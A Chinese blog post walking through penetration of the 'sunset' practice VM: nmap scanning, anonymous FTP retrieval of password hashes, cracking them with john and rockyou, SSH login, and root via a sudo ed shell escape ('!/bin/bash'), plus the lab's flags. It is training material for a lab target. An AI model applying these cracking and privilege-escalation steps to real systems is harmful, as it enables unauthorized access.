sunset靶机渗透实战

作者: 城市烈人 | 来源:发表于2019-08-02 13:00 被阅读98次

sunset靶机渗透,该靶机就是纯主机渗透,比较简单,适合新手练习
本垃圾现在转向工控安全领域继续学习,后续将推出团队或者个人的公众号,希望大家关注
靶机IP:192.168.56.101

信息收集

nmap全扫

nmap -sS -Pn -A -p- -n 192.168.56.101
image.png

就只有21和22两个端口服务开发,21的FTP还能匿名登录,上去看看

匿名登录FTP

ftp 192.168.56.101
anonymous
image.png

发现一个备份文件backup,down下来看看

image.png
CREDENTIALS:                                                                                                   
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.              
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/          
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0                 
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/

这些都是证书,直接上john解一下

john解

将上述的hash保存为sunset,直接一起john解

john sunset

john解了好久,干脆跑字典

john --wordlist=rockyou.txt sunset
image.png

最后密码为:cheer14

登录提权

ssh sunset@192.168.56.101
cheer14
image.png

登录上去后,发现了 user.txt

5b5b8e9b01ef27a1cc0a2d5fa87d7190

不知道什么东西,解不出啦

查看下权限

sudo -l
image.png

发现有root权限免密执行/usr/bin/ed,用来提权

提权

执行试试

sudo /usr/bin/ed

并没有什么

查看下可执行的二进制文件并没有什么发现

image.png

随手试了试

sudo /usr/bin/ed
!/bin/bash
image.png

直接拿到root权限

直接拿flag

image.png
25d7ce0ee3cbf71efbac61f85d0c14fe

靶机百度云下载

链接:https://pan.baidu.com/s/1fjlXw2JoSKRjBWcqhWQ11A
提取码:anr0

相关文章

  • sunset靶机渗透实战

    sunset靶机渗透,该靶机就是纯主机渗透,比较简单,适合新手练习本垃圾现在转向工控安全领域继续学习,后续将推出团...

  • Gear_Of_War#1靶机渗透实战

    Gear_Of_War#1靶机渗透实战 1、信息收集 先探测smb服务 发现靶机开启了该共享 //192.168....

  • BTRsys-2渗透实战

    BTRsys-2靶机渗透实战 靶机IP:192.168.8.134 信息收集 nmap全端口扫 共有三个服务: w...

  • Born2rootv2渗透实战

    Born2rootv2渗透实战 靶机IP:192.168.56.105 nmap全端口扫 web渗透 直接跑一遍目...

  • Bob_v1.0.1渗透实战

    Bob_v1.0.1渗透实战 该靶机有意思的是如何绕过webshell命令执行,进而反弹shell后;在靶机中信息...

  • HackInOS渗透实战

    HackInOS渗透实战 该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我...

  • 渗透靶机

    1.metasploitable-linux-2.0 https://excellmedia.dl.sourcef...

  • MinUv2靶机渗透实战

    这篇在安全客投稿失败,就发布在简书上吧以后大家可以在安全客上关注我:hack-shark 靶机IP发现 靶机发现,...

  • 渗透测试实战——prime靶机入侵

    Ip:192.168.0.115 Kali:192.168.0.21 安装好的靶机界面 【注:Nmap是一个网络连...

  • covfefe渗透实战

    该渗透实战利用了私钥登录ssh,解密私钥、堆栈溢出提权等操作,算是对基本功操作进行巩固吧。。。靶机IP:192.1...

网友评论

    本文标题:sunset靶机渗透实战

    本文链接:https://www.haomeiwen.com/subject/iucldctx.html